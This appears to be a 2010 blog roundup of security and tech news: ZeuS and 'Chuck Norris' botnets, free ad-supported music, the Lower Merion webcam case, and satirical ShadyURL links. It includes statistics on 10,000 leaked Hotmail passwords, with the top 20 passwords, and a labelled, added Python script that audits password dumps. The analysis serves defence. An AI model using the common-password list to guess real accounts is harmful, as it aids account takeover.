A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves. The gang most likely began by hiring spam specialists to send out e-mail and social-networking posts to lure recipients into clicking on a tainted Web link. They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”

This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.

News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article

Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.

“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”

Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.

The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.

In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.

News item 3:  http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.

Below are the statistics:

  • The list initially contained 10,028 entries.
  • After I cleaned up the list, removing entries without a password, I had 9843 valid entries (passwords).
  • There are 8931 (90%) unique passwords in the list.
  • The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
  • The shortest password was 1 char long: ")"

Top 20 most common passwords:

  1. 123456 – 64
  2. 123456789 – 18
  3. alejandra – 11
  4. 111111 – 10
  5. alberto – 9
  6. tequiero – 9
  7. alejandro – 9
  8. 12345678 – 9
  9. 1234567 – 8
  10. estrella – 7
  11. iloveyou – 7
  12. daniel – 7
  13. 000000 – 7
  14. roberto – 7
  15. 654321 – 6
  16. bonita – 6
  17. sebastian – 6
  18. beatriz – 6
  19. mariposa – 5
  20. america – 5

Based on these passwords I think the phishing kit was targeted towards the Latino community.

Password length distribution (length – number of passwords – share of the list):

  • 1 chars – 2 – 0 %
  • 2 chars – 4 – 0 %
  • 3 chars – 4 – 0 %
  • 4 chars – 31 – 0 %
  • 5 chars – 49 – 1 %
  • 6 chars – 1946 – 22 %
  • 7 chars – 1254 – 14 %
  • 8 chars – 1838 – 21 %
  • 9 chars – 1091 – 12 %
  • 10 chars – 772 – 9 %
  • 11 chars – 527 – 6 %
  • 12 chars – 431 – 5 %
  • 13 chars – 290 – 3 %
  • 14 chars – 219 – 2 %
  • 15 chars – 157 – 2 %
  • 16 chars – 190 – 2 %
  • 17 chars – 56 – 1 %
  • 18 chars – 17 – 0 %
  • 19 chars – 7 – 0 %
  • 20 chars – 14 – 0 %
  • 21 chars – 10 – 0 %
  • 22 chars – 8 – 0 %
  • 23 chars – 3 – 0 %
  • 24 chars – 3 – 0 %
  • 25 chars – 3 – 0 %
  • 26 chars – 0 – 0 %
  • 27 chars – 3 – 0 %
  • 28 chars – 0 – 0 %
  • 29 chars – 1 – 0 %
  • 30 chars – 1 – 0 %

As you can see from the list above, most of the passwords are between 6 and 9 characters long.  Average password length is 8 characters.

What kind of passwords were in the list?

  • 3,713 = 42 %; lower alpha passwords: passwords containing only characters from ‘a’ to ‘z’.
    Example: iloveyou
  • 291 = 3 %; mixed case alpha passwords: passwords containing characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’.
    Example: ILoveYou
  • 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0’ to ‘9’).
    Example: 123456
  • 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’ to ‘z’, ‘A’ to ‘Z’ and ‘0’ to ‘9’.
    Example: Iloveyou12
  • 565 = 6 %; mixed alpha, numeric and other characters.
    Example: 1Love You$%@
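The statistics above (top-N, length distribution, character-class buckets) are the standard output of a password audit, and a defender can compute the same figures from any credential dump or from a cracked internal password set. The following is an added example, not the Acunetix author's script: it applies the write-up's clean-up step (entries without a password are dropped) and produces the same tables from constructed sample entries. Two details are my reading of the write-up rather than stated there: its length and class tables sum to the unique-password count (8931), so those are computed over unique passwords while the top-N counts cover all entries; and all-uppercase passwords, which it never mentions, are filed under mixed case.

```python
"""Password-audit statistics of the kind in the Hotmail-leak write-up.

Added example, not the write-up author's script.  Given (username, password)
pairs it drops entries without a password, then reports the counts the
write-up shows: total and unique passwords, the most common ones, the length
distribution and the five character-class buckets.  The entries below are
constructed; the class rules are my reading of the write-up's descriptions
(all-uppercase passwords, which it does not mention, fall under mixed case).
"""
import string
from collections import Counter

LOWER, UPPER, DIGITS = set(string.ascii_lowercase), set(string.ascii_uppercase), set(string.digits)
CLASS_ORDER = ["lower-alpha", "mixed-case", "numeric", "alnum", "complex"]

# Constructed sample; the values echo the write-up's examples, the accounts are fictional.
SAMPLE_ENTRIES = [
    ("ana@example.com", "123456"),
    ("luis@example.com", "123456"),
    ("pepe@example.com", "123456"),
    ("eva@example.com", "tequiero"),
    ("raul@example.com", "ILoveYou"),
    ("sara@example.com", "Iloveyou12"),
    ("ivan@example.com", "1Love You$%@"),
    ("leo@example.com", "000000"),
    ("mia@example.com", ""),            # no password: dropped during clean-up
    ("noa@example.com", "mariposa"),
    ("ian@example.com", ")"),
]


def classify(password):
    """Bucket a password into one of CLASS_ORDER by the character sets it uses."""
    if not password:
        raise ValueError("empty password")
    chars = set(password)
    if chars <= LOWER:
        return "lower-alpha"            # only a-z
    if chars <= DIGITS:
        return "numeric"                # only 0-9
    if chars <= LOWER | UPPER:
        return "mixed-case"             # letters only, at least one capital
    if chars <= LOWER | UPPER | DIGITS:
        return "alnum"                  # letters and digits, no symbols
    return "complex"                    # anything else (space, punctuation, ...)


def pct(part, whole):
    """Whole-number percentage, rounded half up like the write-up's tables."""
    return int(100 * part / whole + 0.5) if whole else 0


def audit(entries, top_n=20):
    """Compute the write-up's statistics; returns a plain dict for easy checking."""
    passwords = [p for _, p in entries if p]            # clean-up step
    if not passwords:
        raise ValueError("no passwords to audit")
    counts = Counter(passwords)                          # top-N is over all entries
    unique = list(counts)                                # length/class tables sum to the
    lengths = Counter(len(p) for p in unique)            # unique count in the write-up
    classes = Counter(classify(p) for p in unique)
    return {
        "total": len(passwords),
        "unique": len(unique),
        "top": counts.most_common(top_n),
        "longest": max(unique, key=len),
        "shortest": min(unique, key=len),
        "avg_length": int(sum(map(len, unique)) / len(unique) + 0.5),
        "length_dist": [(n, lengths[n], pct(lengths[n], len(unique)))
                        for n in range(1, max(lengths) + 1)],
        "classes": {c: (classes[c], pct(classes[c], len(unique))) for c in CLASS_ORDER},
    }


def report(stats):
    """Render the statistics in the write-up's layout."""
    lines = [f"{stats['total']} valid entries, {stats['unique']} unique passwords",
             f"longest: {stats['longest']!r}, shortest: {stats['shortest']!r}, "
             f"average length {stats['avg_length']}", "top passwords:"]
    lines += [f"  {i}. {pw} - {n}" for i, (pw, n) in enumerate(stats["top"], 1)]
    lines += ["length distribution:"]
    lines += [f"  {n} chars - {count} - {p} %" for n, count, p in stats["length_dist"]]
    lines += ["character classes:"]
    lines += [f"  {count} = {p} %; {c}" for c, (count, p) in stats["classes"].items()]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(audit(SAMPLE_ENTRIES)))
```

Running it on a real dump means replacing SAMPLE_ENTRIES with the parsed file; the classify() buckets are checked in order, so a password that is only digits is reported as numeric before the alphanumeric test can claim it, which matches the write-up's categories being mutually exclusive.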

News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say.  Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.

The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.

Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.

The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has marshaled.

News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.

The FBI is reportedly investigating a Pennsylvania school district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.

News item 6:  http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web, and even if it just so happens that an attractive young woman going by the unusual name of “Numbers Anacker” (user id Man17782) has never posted a single item to my site, I might be likely to follow her. As would more and more folks (some of whom are following her back – presumably because they are intrigued by her photograph). As the following YouTube video demonstrates, this appears to be an attempt to get people to sign up for a website that offers to find adults new sexual partners.

News item 7: http://www.shadyurl.com/

Link shortening has become commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that is that the companies doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.

Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whomever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.

Here are some of the gems it spit out on some common sites:

Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez